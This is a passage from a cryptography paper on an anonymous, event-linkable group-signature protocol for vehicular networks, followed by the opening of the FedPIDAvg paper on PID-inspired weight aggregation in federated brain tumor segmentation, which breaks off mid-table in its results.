### _Verification of event signatures_ Any recipient of an event signature \(\sigma_{e}\) can run the verification algorithm \(\mathsf{EVer}(\mathsf{et},\mathit{epk},m_{e},\sigma_{e})\) to check the validity of the signature using the corresponding event-linking token. The algorithm proceeds as follows. Parse \(\sigma_{e}=(s_{e},c_{e})\). Compute \(\tilde{R}=\mathcal{H}_{1}(\mathsf{et})^{s_{e}}\mathit{epk}^{-c_{e}}\) and \(\tilde{c}=\mathcal{H}_{2}(\mathsf{et},m_{e},\mathit{epk},R)\). If \(c_{e}=\tilde{c}\), then output 1, else output 0. ### _The event-linking algorithm on group signatures_ Any recipient of two group signatures \(\sigma_{0},\sigma_{1}\) on an event et can run a linking algorithm \(\mathsf{Link}(\mathsf{et},m_{0},\sigma_{0},m_{1},\sigma_{1})\) to check if the two signatures are signed by the same OBU. The algorithm proceeds as follows. Parse \(\sigma_{b}\) as \((D_{b},B_{b},T_{b},c_{b},s_{x,b},s_{y,b},s_{\alpha,b},s_{\delta,b})\) for \(b=0,1\). The algorithm compares the event-linking tokens \(T_{0},T_{1}\): if \(T_{0}=T_{1}\), then output 1 else, output 0. An OBU \(i\) can generate at most one event-linking token for a certain event. This guarantees that all the messages signed by the OBU using group signatures and event signatures on a certain event are linkable by any recipient, which effectively thwarts Sybil attacks as early as possible. However, these group signatures and event signatures do not leak any information about the OBU's long-term identity \(\mathsf{upk}[i]\) to the public, which preserves the OBU's anonymity. ### _Opening group signatures_ The opener can run an opening algorithm \(\mathsf{Open}(\mathsf{gpk},\mathsf{mok},\mathsf{reg},\sigma)\) to recover the identity of the signer of a group signature \(\sigma\) and produce a tracing proof \(\pi\) attesting to this fact. The algorithm proceeds as follows. Parse \(\sigma\) as \((D,B,T,c,s_{x},s_{y},s_{\alpha},s_{\delta})\). Computes \(A=BD^{-\xi}\) and finds \(i\) such that \(\mathsf{reg}[i]=(x,A)\) for some \(x\). \(i\) is the identity of the original signer. Then the algorithm produces proof that this signature is indeed produced by \(i\). Choose \(r\leftarrow\mathbb{Z}_{p}^{s}\), compute the proof as \(\pi=(K,s,c,x)\) where \(K=D^{\xi},c=\mathcal{H}_{2}(\sigma,K,u^{r},D^{r}),s=r+\xi c\), and return \((i,\pi)\). ### _Judging tracing proofs_ Any recipient of a group signature \(\sigma\) and a tracing proof \(\pi\) can run a judging algorithm \(\mathsf{Judge}(\mathsf{gpk},i,\mathsf{upk}[i],\sigma,\pi)\) to verify if \(\pi\) is a valid proof that OBU \(i\) produced \(\sigma\). The algorithm proceeds as follows. Parse \(\sigma\) as \((D,B,T,c,s_{x},s_{y},s_{\alpha},s_{\delta})\) and \(\pi=(K,s,c,x)\). Let \(z=\mathsf{upk}[i]\). Compute \(\tilde{c}=\mathcal{H}_{2}(\sigma,K,u^{s}h^{-c},D^{s}K^{-c})\). If \(\tilde{c}=c\) and \(\hat{\mathsf{e}}(BK^{-1},wg_{2}^{x})=\hat{\mathsf{e}}(g_{1}z^{-1},g_{2})\) output 1, else output 0. ## VI Applications in vehicular networks In this section, we describe how to apply the proposed AEE protocol to exemplar applications of V2X communications. The discussion here mainly focuses on how to instantiate events in each application which decides the way the vehicle messages are linked. Generally speaking, the realisation of events is flexible and can vary from case to case. The events have to be updated periodically to protect a vehicle's long-term privacy. The more frequently the events are changed, the stronger privacy and weaker linkability. 
The events can be chosen by an authority, like RSU, and can also be chosen by an individual vehicle, such as the lead vehicle in a platoon or a vehicle launching a certain event such as cooperative positioning [15, 28], or can be chosen by establishing an agreement among a group of vehicles. To demonstrate how the proposed AEE scheme can be used in V2X system applications, we consider two exemplar use cases in vehicular networks: intersection management [14, 12] and cooperative awareness messages [4]. ### _Intersection management_ When an authority RSU is nearby, events can be created by the authority. We consider the intersection management [14, 12] for scheduling connected and autonomous vehicles to cross a traffic intersection safely. These techniques utilise the communication between a central controller and vehicles, while the conventional traffic control methods, such as stop signs and traffic lights, have been removed. An intersection controller is a program that runs on a centralised infrastructure physically located at the intersection. The controller only supervises vehicles located within a certain distance of the intersection. A centralised intersection scheduling algorithm [14, 12] proceeds as follows: 1. When a vehicle approaches an intersection area, the vehicle periodically broadcasts its status information, such as the vehicle's position, heading, desired velocity, the brake or accelerator input, vehicle profile and future path. 2. If the current states of the controlled vehicles lead to an inevitable collision, the controller broadcasts a safe input to override the inputs of the controlled vehicles. Though the main goal of such intersection scheduling algorithms is to avoid collisions, the controller can also consider some mechanisms to optimise the system performance, such as reducing the aggregate fuel consumption. 3. The controller samples the next set of vehicles and repeats the above steps. In this application scenario, events can be generated and updated by the controller. The controller can construct an event as \(\mathsf{et}:=\) "intersection location \(\mathbb{I}\) timestamp" to avoid using the same et at different intersections. This prevents the vehicles from being tracked at different intersections. The controller broadcasts the current et. The authenticity of the et from RSU can be easily achieved using digital signatures and PKI certificates since RSU does not need privacy protection. When a vehicle \(i\) approaches the intersection area, it creates and broadcasts a group signature \(\sigma_{i}\) on et. The event-linking token \(T_{i}\) in \(\sigma_{i}\) serves as a temporary identifier of the vehicle \(i\) for the scheduling purpose. The vehicle continues to periodically update and sign its status information using the event signatures. The controller computes a safe input \(u_{i}\) for vehicle \(i\) based on the control strategy mentioned in the above step 2). Then the controller signs and broadcasts \((T_{i},u_{i})\) to inform the vehicle \(i\) to change its control input to \(u_{i}\). At the sender side, the group signature \(\sigma_{i}\) is computed only once for each event. In case of packet loss, \(\sigma_{i}\) can be re-broadcast once every \(n\) messages to enhance robustness [9]. At the receiver's side, \(\sigma_{i}\) is verified upon the first reception and stored for validating the following event signatures. Different intersections use different events to ensure that a vehicle won't be identified among intersections. 
But a vehicle's movement can be tracked within the intersection region in a short time period to enable the controller to run the scheduling algorithms and to monitor that the vehicle is following the controller's output. The controller can decide when to change to a new event according to the traffic densities. If there is a traffic jam in the intersection area, for example, when the average waiting time of a vehicle is about an hour, then the event will be updated less frequently and may last for hours. When the traffic density is low, events can be changed more frequently. The controller can choose to change events at the point when its scheduling algorithms start to sample a new set of vehicles, i.e., step 3) in the above description. If the controller uses an event for too long, the multiple activities of the same vehicle passing through the intersection can be identified. For example, a vehicle crossing the intersection at 9:00 in the morning and later passing through this intersection again at 17:00 in the afternoon if the controller uses the same event for a day. ### _Cooperative awareness messages_ This application enables vehicles to improve their awareness of the key road traffic events by exchanging status information, e.g., position, dynamics and attributes, in the periodically transmitted cooperative awareness messages (CAM) [4]. The information in CAMs forms the basis for many safety applications in V2X communications, such as collision avoidance, traffic condition warning, and hazard warning [5]. According to the European standard [4], the CAM generation interval is between \(0.1s\sim 1s\), and the data processing time of CAM should not exceed 50ms in order to ensure the effectiveness of the safety messages. Note that all the vehicles nearby have to use the same et within a certain time period to track a vehicle's local movements to avoid collisions. The et should also be updated periodically to protect a vehicle's long-term privacy. A simple way to deal with these problems is to pre-define et as a timestamp which is valid in a certain timeslot. For example, from 10:00 and to 10:10 am on 1 March 2017, all the vehicles will use the et \(:=``201703011000"\), and then switch to a new et \(:=``201703011010"\) from 10:10 am to 10:20 am, and so on. This approach for generating et does not rely on the presence of any central authority such as RSU. Instead, all the vehicles agree in advance to produce and update their ets using a pre-defined method. The advantage of this method is all the et that will be used in future become predictable. As a result, the time-consuming group signatures in our scheme can be computed offline when a vehicle does not have heavy computation work, e.g., parked at the garage. If the et is changed every 10 mins, then a total number of 144 ets are needed for a whole day's use. Using the evaluation results in next Section VII, computing 144 group signatures for these ets will only take 1.83s on the laptop and 22.8s on Raspberry Pi 3. Thus the offline computation of the group signatures can be made without being noticeable to the users. ## VII Implementation We have implemented the proposed \(\mathcal{ALE}\) scheme using the Pairing Based Cryptography (PBC) Library[1]. Our tests use a _d-type_ curves (\(d224\)) from PBC library. Although currently there is no agreement about a vehicle's on-board hardware capabilities, we present illustrative measures taken from an experiment done with an ASUS ZenBook3 UX390UA1 and a Raspberry Pi 3 (model B)[2]2. 
Footnote 1: Powered by Intel i7500U with SGB RAM Footnote 2: Powered by a 1.2GHz 64-bit quad-core ARM%8 CPU and 1GB RAM. In our \(\mathcal{ALE}\) scheme, the group signatures consists of 3 elements from \(\mathbb{G}_{1}\) and 5 elements from \(\mathbb{Z}_{p}\) which retains the normal size of a short group signature scheme [7, 11, 20] as shown in Table I. The event signatures are significantly shorter, consisting of 2 elements from \(\mathbb{Z}_{p}\). The actual size when implemented on curve d224 is summarised in Table II. The compressed size is obtained using PBC compression algorithm on the elements in \(\mathbb{G}_{1}\). Table III shows the running time of group operations including multiplication, exponentiation and pairing. _Optimisation of_GSign:_ This algorithm can be optimised to be pairing-free. Specifically, notice that the \(R_{4}\) can be transformed to: \[R_{4} =\hat{\mathfrak{e}}(B,g_{2})^{r_{x}}\hat{\mathfrak{e}}(h,\omega) ^{r_{a}}\hat{\mathfrak{e}}(h,g_{2})^{r_{y}+r_{g}}\] \[=\hat{\mathfrak{e}}(A,g_{2})^{r_{x}}\hat{\mathfrak{e}}(h,\omega) ^{r_{a}}\hat{\mathfrak{e}}(h,g_{2})^{a\cdot r_{x}+r_{y}+r_{g}}\] The pairings \(\hat{\mathfrak{e}}(A,g_{2})\), \(\hat{\mathfrak{e}}(h,\omega)\) and \(\hat{\mathfrak{e}}(h,g_{2})\) in \(R_{4}\) are reusable and does not depend on any variable generated during the procedure; therefore they can be computed in advance to reduce computation. _Optimisation_GVer:_ The number of pairing operations can be reduced by modifying \(\hat{R}_{4}\) as below: \[\hat{R}_{4} =\hat{\mathfrak{e}}(B,g_{2})^{r_{x}}\hat{\mathfrak{e}}(h,w)^{s_{ a}}\hat{\mathfrak{e}}(h,g_{2})^{s_{y}+s_{s}}\bigg{(}\frac{\hat{\mathfrak{e}}(B,w)}{ \hat{\mathfrak{e}}(g_{1},g_{2})}\bigg{)}^{c}\] \[=\hat{\mathfrak{e}}(\frac{B^{s_{x}}h^{s_{y}+s_{g}}}{g_{1}^{s}},g _{2})\ \hat{\mathfrak{e}}(h^{s_{a}}B^{c},w)\] Table IV summarised the number of group operations of GSign and GVer after optimisation. Here \(\mathit{mul}_{\mathbb{G}_{1}}\), \(\mathit{mul}_{\mathbb{G}_{T}}\), \(\mathit{exp}_{\mathbb{G}_{1}}\) and \(\mathit{exp}_{\mathbb{G}_{T}}\) are multiplications on \(\mathbb{G}_{1}\) and \(\mathbb{G}_{T}\), and exponentiations on \(\mathbb{G}_{1}\) and \(\mathbb{G}_{T}\), respectively. Despite the fact that processors we tested are multi-cored, neither PBC nor our implementation has utilised any parallelisation; hence it would be reasonable to expect our profiles being applicable even for single core processors. Our implementation does not have any curve dependency; therefore it can be easily ported to any other qualified curves by simply specifying a different curve parameter file. Table V presents the timing profile of our \(\mathcal{ALE}\) protocol. Each result is calculated on 1000 samples. ESPign and EVer are 10 times faster than GSign and GVer respectively. GSign and GVer only needs to be performed once for each event, \begin{table} \begin{tabular}{c|c|c|c} \hline & BBS [7] & TAA [11] & PS-OL & Ours \\ \hline Group Sig. & \(3\mathbb{G}_{1}+6\mathbb{Z}_{p}\) & \(\begin{array}{c}5G_{1}+3\mathbb{Z}_{p}\) (v1) \\ 7G_{1}+3\mathbb{Z}_{p}\) (v2) \\ \hline Event Sig. & \multicolumn{3}{c|}{N/A} & \multicolumn{1}{c}{\(2\mathbb{Z}_{p}\)} \\ \hline \end{tabular} \end{table} TABLE II: Size of signatures in \(\mathcal{ALE}\) (bytes). \begin{table} \begin{tabular}{c|c|c|c} \hline & Full & Compressed \\ \hline Group Sig. & 308 & 227 \\ Event Sig. & 56 & 56 \\ \hline \end{tabular} \end{table} TABLE I: Comparison of signature length. 
while \(\mathsf{ESign}\) and \(\mathsf{EVer}\) are for the frequent use of safety message authentication. Note that the time for \(\mathsf{Open}\) only includes the time for recovering \(A\); the search for user identity is the equality comparison which does not involve any cryptographic operations and can be optimised to be \(O(1)\) using \(A\) as index in the database. ## VIII Security analysis In this section, we informally describe the definitions of the security requirements of anonymity, traceability, event linkability and unforgeability and analyse that our protocol satisfies the correctness and these security requirements. Each security property is defined as an experiment conducted between an adversary and a challenger (see Figure 2 in the appendix). The adversary can win the experiment when certain conditions are satisfied. The protocol satisfies a security property defined by an experiment when any adversary's winning probability is negligible. For the sake of readability, the detailed security models and proofs can be found in the appendix. **Theorem 1**: _The AEE protocol is correct._ We show the correctness of the proposed protocol. First, the signing and verifying algorithms are correct because of the following relations: \[R_{1} =u^{r_{\alpha}}=u^{s_{\alpha}+c\alpha}=u^{s_{\alpha}}D^{c}\] \[R_{2} =\mathcal{H}_{2}(\mathsf{et})^{r_{y}}=\mathcal{H}_{2}(\mathsf{et} )^{s_{y}-cy}=\mathcal{H}_{2}(\mathsf{et})^{s_{y}}T^{-c}\] \[R_{3} =u^{r_{2}}D^{r_{x}}=u^{s_{\delta}+c\alpha^{x}}D^{s_{x}-c\alpha}=u^ {s_{\delta}}D^{s_{x}}\] \[R_{4} =\hat{\mathsf{e}}(B,g_{2})^{r_{x}}\hat{\mathsf{e}}(h,w^{r_{\alpha }}\hat{\mathsf{e}}(h,g_{2})^{s_{y}+s_{\delta}}\] \[=\hat{\mathsf{e}}(B,g_{2})^{s_{x}-c\alpha}\hat{\mathsf{e}}(h,w^{ s_{\alpha}}\hat{\mathsf{e}}(h,g_{2})^{s_{y}+s_{\delta}}\] \[=\hat{\mathsf{e}}(B,g_{2})^{s_{x}}\hat{\mathsf{e}}(h,w)^{s_{\alpha }}\hat{\mathsf{e}}(h,g_{2})^{s_{y}+s_{\delta}}\!\left(\frac{\hat{\mathsf{e}}(B,w)}{\hat{\mathsf{e}}(g_{1},g_{2})}\right)^{c}\] The last equation is because \(\hat{\mathsf{e}}(g_{1},g_{2})=\hat{\mathsf{e}}(B,w)\hat{\mathsf{e}}(B,g_{2})^{x}\)\(\hat{\mathsf{e}}(h,w)^{-\alpha}\hat{\mathsf{e}}(h,g_{2})^{y-\alpha x}\). The \(\mathsf{Open}\) algorithm is correct because of \(v^{\alpha}=u^{\ell\alpha}\). The \(\mathsf{Judge}\) algorithm is correct because \(\hat{\mathsf{e}}(A,wg_{2}^{x})=\hat{\mathsf{e}}(g_{1}h^{-y},g_{2})\) when \(A=(g_{1}h^{-y})^{\frac{1}{1+\alpha}x}\). The \(\mathsf{ESign}\) and \(\mathsf{EVer}\) are correct because \(R=\mathcal{H}_{1}(\mathsf{et})^{r}=\mathcal{H}_{1}(\mathsf{et})^{s_{x}-c_{y} }=\mathcal{H}_{1}(\mathsf{et})^{s_{x}}T^{-c}\). The \(\mathsf{Link}\) algorithm is correct because, it outputs 1 when \(i_{0}=i_{1}\) since \(T_{0}=T_{1}=\mathcal{H}_{1}(\mathsf{et})^{y}\). When \(i_{0},\neq i_{1}\), the probability that \(y_{i_{0}}=y_{i_{1}}\) is negligible since \(y_{i_{0}}\) and \(y_{i_{1}}\) are chosen uniformly at random. Then we know that \(T_{0}=\mathcal{H}_{1}(\mathsf{et})^{y_{0}}\neq T_{1}=\mathcal{H}_{1}(\mathsf{et })^{y_{i_{1}}}\) with overwhelming probability when \(i_{0},\neq i_{1}\). Therefore, the probability that \(\mathsf{Link}\) outputs 1 when \(i_{0}\neq i_{1}\) is negligible. **Theorem 2**: _The AEE protocol is anonymous under the XDH assumption._ _Following [6], anonymity is defined in a way that the adversary does not need to recover the identity of a signer only distinguishes which of two signers of its choice signed a target message of its choice. 
This definition covers both identity anonymity and unlinkability. In the experiment of defining anonymity, the adversary can learn the master issuing key, and the personal secret and group signing keys of any users except the challenge members. The adversary is not given the master opening key, otherwise identifying the signer would become trivial. In the proof, we construct an adversary who breaks the XDH assumption from an adversary who breaks the anonymity of the protocol. Intuitively, in a group signature \(\sigma=(D,B,T,c,s_{x},s_{y},s_{\alpha},s_{\delta})\), the part \((D,B)=(u^{\alpha},A\cdot h^{\alpha})\) is an encryption of the signer's identity and the other parts can be simulated using randoms. Since the encryption does not leak any information about \(A\), the adversary cannot use it to link two signatures of the same signer or different signers. This justifies why the protocol satisfies anonymity. **Theorem 3**: _The AEE protocol is traceable under the \(q\)-SDH assumption._ _In the experiment of defining traceability, an adversary generates a group signature \(\sigma\) on an event et and a message \(m\) of his choice. The adversary can learn the master opening key as well as any user's secret key and group signing key. The adversary wins if \(\sigma\) opens to an invalid member or the tracing proof does not verify. Note that the adversary is not given the master issuing key since this would allow the adversary to create dummy group members which cannot be tracked. The proof goes by constructing an adversary \(\mathcal{B}\) which breaks the \(q\)-SDH assumption using an adversary \(\mathcal{A}\) which breaks traceability as a subroutine. If the signature produced by the adversary \(\mathcal{A}\) is valid, then \(\mathcal{B}\) can extract a group signing key \((\Delta x,\Delta y,A=(g_{1}h^{-\Delta y})^{\frac{1}{1+\Delta x}})\) and \begin{table} \begin{tabular}{|c|c|c|c|c|} \hline & & ZenBook & Raspberry Pi 3 \\ \hline \multirow{2}{*}{_mul_}{_} & \(\mathsf{G}_{1}\) & 0.003 & 0.02 \\ & \(\mathsf{G}_{2}\) & 0.02 & 0.23 \\ & \(\mathsf{G}_{T}\) & 0.005 & 0.07 \\ \hline \multirow{2}{*}{_exp_} & \(\mathsf{G}_{1}\) & 0.92 & 5.65 \\ & \(\mathsf{G}_{2}\) & 6.48 & 60.47 \\ & \(\mathsf{G}_{T}\) & 2.35 & 26.52 \\ \hline _pairing_ & & 6.19 & 61.93 \\ \hline \end{tabular} \end{table} TABLE III: Performance of group operations (\(\mathsf{m}\)). \begin{table} \begin{tabular}{|c|c|c|c|c|} \hline \multicolumn{5}{|c|}{ZenBook3} \\ \hline \(\mathsf{GSign}\) & \(\mathsf{GVer}\) & \(\mathsf{ESign}\) & \(\mathsf{EVer}\) & \(\mathsf{Link}\) & \(\mathsf{Open}\) \\ 12.72 & 26.55 & 1.25 & 2.31 & \(<\)0.001 & 0.001 \\ \hline \multicolumn{5}{|c|}{Raspberry Pi 3} \\ \hline \(\mathsf{GSign}\) & \(\mathsf{GVer}\) & \(\mathsf{ESign}\) & \(\mathsf{EVer}\) & \(\mathsf{Link}\) & \(\mathsf{Open}\) \\ 158.62 & 201.84 & 16.02 & 24.66 & 0.004 & 0.012 \\ \hline \end{tabular} \end{table} TABLE V: Timing profile of \(\mathcal{ALE}\) (\(\mathsf{ms}\)). event-inking tokens \(T=\mathcal{H}_{1}(\text{et})^{\Delta y}\) using forking lemma. If this group signing key does not belong to any valid group member, then \(\mathcal{B}\) can use to construct a solution for the \(q\)-SDH problem. **Theorem 4**: _The AEE protocol is event linkable under the \(q\)-SDH assumption._ In the experiment of defining event-linkability, an adversary can learn the master opening key and any user's secret key and group signing key. The adversary produces two group signatures on the same event using group signing keys of his choice. 
The adversary wins if the two signatures are opened to the same signer but cannot be linked by the Link algorithm, or they are opened to different signers but are linked by the Link algorithm. The proof goes by constructing an adversary \(\mathcal{B}\), which breaks the \(q\)-SDH assumption, using an adversary \(\mathcal{A}\), which breaks the event-linkability, as a subroutine. If the two signatures produced by the adversary \(\mathcal{A}\) are valid, then \(\mathcal{B}\) can extract two group signing keys \((\Delta x_{b},\Delta y_{b},A_{b}=(g_{1}h^{-\Delta y_{b}})^{\frac{1}{\gamma+\Delta x_{b}}})\) and event-linking tokens \(T_{b}=\mathcal{H}_{1}(\text{et})^{\Delta y_{b}}\) for \(b=0,1\) using the forking lemma. If the two group signing keys are the same, then \(T_{0}=T_{1}\) and the Link algorithm should output \(1\). Otherwise, \(T_{0}\neq T_{1}\) and the Link algorithm should output \(0\). **Theorem 5**: _The AEE protocol is non-frameable under the DL assumption._ In the experiment defining non-frameability of group signatures, an adversary can compromise the master issuing key, the master opening key and any user's secret key and group signing key. The adversary produces a group signature \(\sigma\) on an event et and a message \(m\) of his choice and a proof \(\pi\). The adversary wins if the signature and the proof are both valid and the signature is traced to a member whose group signing key is not compromised. The proof of this theorem goes by constructing an adversary \(\mathcal{B}\), which breaks the DL assumption, using an adversary \(\mathcal{A}\), which breaks the non-frameability. **Theorem 6**: _The AEE protocol is event-unforgeable under the DL assumption._ In the experiment defining the unforgeability of the event signature, an adversary can compromise the master issuing key, the master opening key, and any user's secret key and group signing key. The adversary produces two group signatures on the same event using group signing keys. The adversary wins if the two signatures are traced back to a single signer but Link failed to link them. Note that the experiment defining the unforgeability of the event signature might look similar to the one for event linkability in Theorem 4. But the former definition considers a stronger adversary who can compromise the master issuing key and the master opening key and has access to oracles for producing group signatures and event signatures and for modifying the issuer's registration table. ## IX Conclusion We propose an efficient anonymous protocol which supports event-based linkability and revocation. Our protocol introduces a new method for generating temporary public keys to reduce the computational complexity of cryptographic operations. Our concept of event linkability generalises the previous notion of short-term linkability [19] by enabling flexibility on how the vehicles are linked in different situations. We illustrate how to apply our protocol in vehicular communications by two exemplar use cases. ## Acknowledgment This work has been funded by the UK EPSRC as part of the PETRAS IoT Research Hub - Cybersecurity of the Internet of Things grant no: EP/N02334X/1.
2304.12117
FedPIDAvg: A PID controller inspired aggregation method for Federated Learning
This paper presents FedPIDAvg, the winning submission to the Federated Tumor Segmentation Challenge 2022 (FETS22). Inspired by FedCostWAvg, our winning contribution to FETS21, we contribute an improved aggregation strategy for federated and collaborative learning. FedCostWAvg is a weighted averaging method that not only considers the number of training samples of each cluster but also the size of the drop of the respective cost function in the last federated round. This can be interpreted as the derivative part of a PID controller (proportional-integral-derivative controller). In FedPIDAvg, we further add the missing integral term. Another key challenge was the vastly varying size of data samples per center. We addressed this by modeling the data center sizes as following a Poisson distribution and choosing the training iterations per center accordingly. Our method outperformed all other submissions.
Leon Mächler, Ivan Ezhov, Suprosanna Shit, Johannes C. Paetzold
2023-04-24T14:20:53Z
http://arxiv.org/abs/2304.12117v1
# FedPIDAvg: A PID controller inspired aggregation method for Federated Learning ###### Abstract This paper presents FedPIDAvg, the winning submission to the Federated Tumor Segmentation Challenge 2022 (FETS22). Inspired by FedCostWAvg, our winning contribution to FETS21, we contribute an improved aggregation strategy for federated and collaborative learning. FedCostWAvg is a weighted averaging method that not only considers the number of training samples of each cluster but also the size of the drop of the respective cost function in the last federated round. This can be interpreted as the derivative part of a PID controller (proportional-integral-derivative controller). In FedPIDAvg, we further add the missing integral term. Another key challenge was the vastly varying size of data samples per center. We addressed this by modeling the data center sizes as following a Poisson distribution and choosing the training iterations per center accordingly. Our method outperformed all other submissions. Keywords:Federated Learning Brain Tumor Segmentation Control Multi-Modal Medical Imaging MRI MICCAI Challenges Machine Learning ## 1 Introduction Federated learning is a highly promising approach for privacy, and confidential learning across multiple data locations [1]. A vast set of applications exist, ranging from power grids to medicine [2]. Evidently, such approaches are of paramount importance for medical images, because patient information can be highly sensitive [3] and the distribution of medical expertise, as well as the prevalence of certain diseases, is extremely uneven. More practically, medical imaging data is extremely large in size, making the frequent transfer of data from a local clinic to a central server location very expensive [3]. Privacy and safety of patient data is even more emphasized when we consider the large illegal leaks of private medical records to the _dark web[4]_. Figure 1: Schematic illustration of the federated learning concept. One can see how multiple data centers make up one big federation. The training data is stored exclusively at the local centers, where the same model is trained locally for a defined task. E.g., brain tumor segmentation as in our case. In the aggregation step, the model weights are sent and collected at a central server location. Here, the model aggregation is performed and later broadcasted back to the local centers. This procedure is repeated until convergence or another stopping criteria is reached. ### FETS challenge The FETS challenge [5, 6, 7, 8, 9] is an initiative trying to address the main research question of federated learning: optimal aggregation of network weights coming from various data centers. In this paper, we try to address this issue by proposing a PID and classical statistics-inspired solution. ## 2 Prior work ### Federated Averaging (FedAvg) The traditional federated averaging (FedAvg) approach [10] employs an averaging strategy on the local model weights to update the global model, weighted by the training data set sizes of the local models. A model \(M_{i+1}\) is updated as follows: \[M_{i+1}=\frac{1}{S}\sum_{j=1}^{n}s_{j}M_{i}^{j}. \tag{1}\] Here, \(s_{j}\) is the number of samples that model \(M^{j}\) was trained on in round \(i\) and \(S=\sum_{j}s_{j}\). The definition is adapted from [11]. ### Federated Cost Weighted Averaging (FedCostWAvg) Last year, we proposed a new weighting strategy, which won the FETS21 challenge. 
It not only weighs by data center sizes but also by the amount by which the cost function decreased during the last step [11]. We termed this method FedCostWAvg, where the new model \(M_{i+1}\) is calculated in the following manner: \[M_{i+1}=\sum_{j=1}^{n}(\alpha\frac{s_{j}}{S}+(1-\alpha)\frac{k_{j}}{K})M_{i}^{j}. \tag{2}\] with: \[k_{j}=\frac{c(M_{i-1}^{j})}{c(M_{i}^{j})},K=\sum_{j}k_{j}. \tag{3}\] Here, \(c(M_{i}^{j})\) is the cost of the model \(j\) at time-step \(i\), which is calculated from the local cost function [11]. Moreover, \(\alpha\) ranges between \([0,1]\) and is chosen to balance the impact of the cost improvements and the data set sizes. Last year, we won the challenge with an alpha value of \(\alpha=0.5\). We discussed that this weighting strategy adjusted for the training dataset size and also for local improvements in the last training round. ## 3 Methodology In the following chapter, we will first introduce and formalize our novel averaging concept named _FedPIDAvg_. Next, we will quickly describe the neural network architecture for brain tumor segmentation that was given by the challenge organizers and finally discuss our strategy regarding when to train and aggregate from which specific centers, depending on their training samples modeled using a simple Poisson distribution. ### Federated PID Weighted Averaging (FedPIDAvg) As was already mentioned in [11], David Naccache offered the observation that the idea of FedCostWAvg is similar to that of a PID controller. Only the integral term is missing. The methodology of our new averaging method is novel in two ways: the PID-inspired added integral term, and a different way to calculate the differential term. Our method calculates the new model \(M_{i+1}\) in the following manner: \[M_{i+1}=\sum_{j=1}^{n}(\alpha\frac{s_{j}}{S}+\beta\frac{k_{j}}{K}+\gamma\frac{m_{j}}{I})M_{i}^{j}. \tag{4}\] with: \[k_{j}=c(M_{i-1}^{j})-c(M_{i}^{j}),K=\sum_{j}k_{j}. \tag{5}\] and: \[m_{j}=\sum_{l=0}^{5}c(M_{i-l}^{j}),I=\sum_{j}m_{j}. \tag{6}\] \[\alpha+\beta+\gamma=1 \tag{7}\] Note that this time we use the absolute difference between the last cost and the new cost and no longer the ratio. The new strategy is still a weighted averaging strategy, where the weights are themselves weighted averages of three factors: the drop of the cost in the last round, the sum over the costs in the last rounds, and the size of the training data set. These three factors are weighted by \(\alpha,\beta\) and \(\gamma\). Their choice needs to be optimized based on the use case; we chose \(0.45,0.45,0.1\), although we did not have the resources to cross-validate them. ### U-Net for Brain Tumor Segmentation As a segmentation architecture, we were given by the organizers the 3D U-Net, a vastly successful neural network architecture in medical image analysis [12]. No modifications to the architecture were allowed in the challenge; we quickly depict it in Figure 1 for completeness. U-Nets constitute the state of the art for a vast set of applications, for example, brain tumor segmentation [13, 5], vessel segmentation [14, 15] and many more. ### Poisson-distribution modeling of the data samples per center In order to optimize the training speed over several federated rounds, it was possible to only select a subset of data centers for each federated round. In our last year's submission, we simply selected all centers every time. Another part of our submission this year is a novel way to select participating data centers at each federated round. 
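Before turning to the center-selection scheme, the aggregation rule of Eqs. (4)-(7) can be made concrete with a short sketch. The code below is our own illustration; the function names, toy cost histories, and flattened parameter vectors are assumptions for exposition, not part of the official challenge submission:

```python
import numpy as np

def fedpid_weights(sample_counts, cost_histories, alpha=0.45, beta=0.45, gamma=0.10, window=6):
    """Aggregation weights of Eqs. (4)-(7).

    sample_counts[j]  : number of training samples of center j (s_j)
    cost_histories[j] : local costs of center j, oldest first, so that
                        cost_histories[j][-1] is c(M_i^j)
    """
    s = np.asarray(sample_counts, dtype=float)
    # Differential term k_j = c(M_{i-1}^j) - c(M_i^j), Eq. (5).
    k = np.array([h[-2] - h[-1] for h in cost_histories])
    # Integral term m_j: sum of the last `window` local costs, Eq. (6).
    m = np.array([sum(h[-window:]) for h in cost_histories])
    return alpha * s / s.sum() + beta * k / k.sum() + gamma * m / m.sum()

def fedpid_average(local_models, weights):
    """Weighted average of flattened local parameter vectors, Eq. (4)."""
    return np.average(np.stack([np.asarray(p, dtype=float) for p in local_models]),
                      axis=0, weights=weights)

# Toy round with three centers.
counts = [120, 40, 300]
histories = [[1.00, 0.90, 0.80, 0.70, 0.65, 0.60, 0.55],
             [1.20, 1.10, 1.00, 0.95, 0.90, 0.88, 0.80],
             [0.90, 0.85, 0.80, 0.78, 0.75, 0.74, 0.72]]
models = [np.random.randn(10) for _ in counts]
new_model = fedpid_average(models, fedpid_weights(counts, histories))
```

Here `window=6` mirrors the sum over \(l=0,\dots,5\) in Eq. (6); in an actual federated round the averaged objects would be the network's weight tensors rather than flat vectors.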
To select the centers, we resorted to classical statistical means, namely, under the assumption that the dataset sizes follow a Poisson distribution: \[\begin{split} p(x;\lambda)=\frac{e^{-\lambda}\lambda^{x}}{x!}\\ \text{with }x=0,1,2,\cdots\end{split} \tag{8}\] we made the natural choice of dropping out outliers in most rounds, where outliers were defined as having \(x>2\lambda\). ## 4 Results The methods were evaluated on the data of the FeTS challenge. It is described as: "FeTS borrows its data from the BraTS Continuous Evaluation, but additionally providing a data partitioning according to the acquisition origin for the training data. Ample multi-institutional, routine clinically-acquired, pre-operative baseline, multi-parametric Magnetic Resonance Imaging (mpMRI) scans of radiographically appearing glioblastoma (GBM) are provided as the training and validation data for the FeTS 2022 challenge. Specifically, the datasets used in the FeTS 2022 challenge are the subset of GBM cases from the BraTS Continuous Evaluation. Ground truth reference annotations are created and approved by expert board-certified neuroradiologists for every subject included in the training, validation, and testing datasets to quantitatively evaluate the performance of the participating algorithms." Amongst all submitted methods, FedPIDAvg performed best and won the challenge. In Tables 1 and 2 we give last year's results of FedCostWAvg in the previous challenge, and in Tables 3 and 4 the results of FedPIDAvg in FETS22. Note that the data was different this year, as were the limits on available federated rounds. \begin{table} \begin{tabular}{|l|c|c|c|c|c|c|} \hline Label & Dice WT & Dice ET & Dice TC & Sens. WT & Sens. ET & Sens. TC \\ \hline Mean & 0,8248 & 0,7476 & 0,7932 & 0,8957 & 0,8246 & 0,8269 \\ \hline StdDev & 0,1849 & 0,2444 & 0,2643 & 0,1738 & 0,2598 & 0,2721 \\ \hline Median & 0,8936 & 0,8259 & 0,9014 & 0,948 & 0,9258 & 0,9422 \\ \hline 25th quantile & 0,8116 & 0,7086 & 0,8046 & 0,9027 & 